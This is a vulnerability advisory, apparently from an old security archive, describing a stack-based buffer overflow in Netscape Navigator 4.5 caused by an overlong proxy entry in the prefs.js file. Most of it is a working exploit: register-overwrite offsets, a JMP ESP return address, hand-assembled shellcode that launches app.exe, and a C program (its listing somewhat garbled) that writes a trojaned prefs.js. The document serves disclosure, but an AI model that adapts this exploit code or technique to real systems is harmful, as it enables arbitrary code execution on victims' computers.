Netscape Navigator/Communicator


    Netscape Navigator/Communicator 4.5


    Steve Fewer found following.  He recently uncovered a stack  based
    buffer overflow in NN which allowed him to execute arbitrary code.
    It  is  a  local  Attack  where  the  offending party is the users
    'prefs.js' file, usually stored in

        c:\program files\netscape\users\*** where *** is a user

    It occurs when NN reads in  an entry greater than 80 bytes  in the
    network.proxy.http field.   Netscape have  been notified  of  this
    problem.  E.g.


    The EBP  is overrun  at bytes  81 -  84 and  the EIP is overrun at
    bytes 85 - 89, from there on  your code can be placed.  The  first
    80 bytes get blown away when you smash the stack but you are  left
    with a possible 500 bytes or more for your exploit code, (500  was
    the  most  that  Steve  checked).   You're  first  byte of code is
    pointed to by the ESP.

    To  concoct  an  exploit  for  this  to  see  if  it  was actually
    exploitable Steve  pointed his  EIP into  a 'JMP  ESP' located  at
    7FD035EB in shell32.dll (v4.72.3110.6) which NN loads.  Having got
    back to his exploit buffer he simply made it execute a file called
    app.exe, which  should be  located in  \windows\command\ and  then
    made  it  call  exit()  to  tidy  up  so  we don't cause an access
    violation, obviously there  is room for  a more insidious  exploit
    but author doesn't view  this as an enormously  dangerous security
    flaw so it didn't warrant writing anything more sophisticated.

    For  protection  you  could  try  the  latest  version of NN which
    is 4.7.   This was all  created/tested on Windows98  running on an
    Intel PII400 with 128MB RAM.

    This is  the assembly  which runs  a file  app.exe and  then calls
    exit() to clean up.  The op codes are to the right.  Steve  called
    system() at  address 78019824  in msvcrt.dll  v6.00.8397.0 to  run
    app.exe and exit() at address 78005504 in the same DLL to tidy up.

        mov esp,ebp                         // 8BE5
        push ebp                            // 55
        mov ebp,esp                         // 8BEC
        xor edi,edi                         // 33FF
        push edi                            // 57
        sub esp,04h                         // 83EC04
        mov byte ptr [ebp-08h],61h          // C645F861
        mov byte ptr [ebp-07h],70h          // C645F970
        mov byte ptr [ebp-06h],70h          // C645FA70
        mov byte ptr [ebp-05h],2Eh          // C645FB2E
        mov byte ptr [ebp-04h],65h          // C645FC65
        mov byte ptr [ebp-03h],78h          // C645FD78
        mov byte ptr [ebp-02h],65h          // C645FE65
        mov eax, 0x78019824                 // B824980178
        push eax                            // 50
        lea eax,[ebp-08h]                   // 8D45F8
        push eax                            // 50
        call dword ptr[ebp-0ch]             // FF55F4
        push ebp                            // 55
        mov ebp,esp                         // 8BEC
        mov edx,0xFFFFFFFF                  // BAFFFFFFFF
        sub edx,0x87FFAAFB                  // 81EAFBAAFF87
        push edx                            // 52
        xor eax,eax                         // 33C0
        push eax                            // 50
        call dword ptr[ebp-04h]             // FF55FC

    The Exploit:

    /* Stack based buffer overflow exploit for Netscape Navigator 4.5
     * Author Steve Fewer, 22-12-99. Mail me at
     * Netscape Navigator causes a buffer overflow when reading from
     * the users "prefs.js" file. If it reads a string longer than 80
     * bytes in the user_pref("network.proxy.http", "");
     * field it smashes the stack overwrighting the EIP and EBP. This
     * can be used to execute arbitrary code.
     * Tested with Netscape Navigator 4.5 using Windows98 on an Intel
     * PII 400 with 128MB RAM
    #include <stdio.h>
    #include <string.h>
    int main()
        printf("\t\t.....Netscape Navigator 4.5 exploit.....\n");
        printf("\t\t.....Author: Steve Fewer, 22-12-1999....\n");
        // the first 80 bytes. These get blown away when the stack goes down.
        char buff[96];
        // the EBP, we don't need to use it so fill it with B's
        char ebp[8] = "BBBB";
        // we point the EIP into msvcrt.dll v6.00.8397.0 where we find a JMP ESP @ 7FD035EB
        char eip[8] = "\xEB\x35\xD0\x7F";
        // the is our 'arbitrary code', it just runs a file app.exe from the \WINDOWS\COMMAND directory then calls exit() to clean up
        char sploit[128] = "\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x61\xC6\x45\xF9\x70\xC6\x45\xFA\x70\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\xB8\x24\x98\x01\x78\x50\x8D\x45\xF8\x50\xFF\x55\xF4\x55\x8B\xEC\xBA\xFF\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";
        FILE *file;
            for(int i=0;i<80;i++)
            buff[i] = 0x90;
        // just create our new, 'trojand' prefs.js file
        file = fopen("prefs.js","wb");
        // and slap in the the nasty sploit
        fprintf(file,"user_pref(\"network.proxy.http\", \"%s%s%s%s\");", buff, ebp, eip, sploit);
        printf("\t     created file prefs.js loaded with the exploit.\n");
    return 0;


    Nothing yet.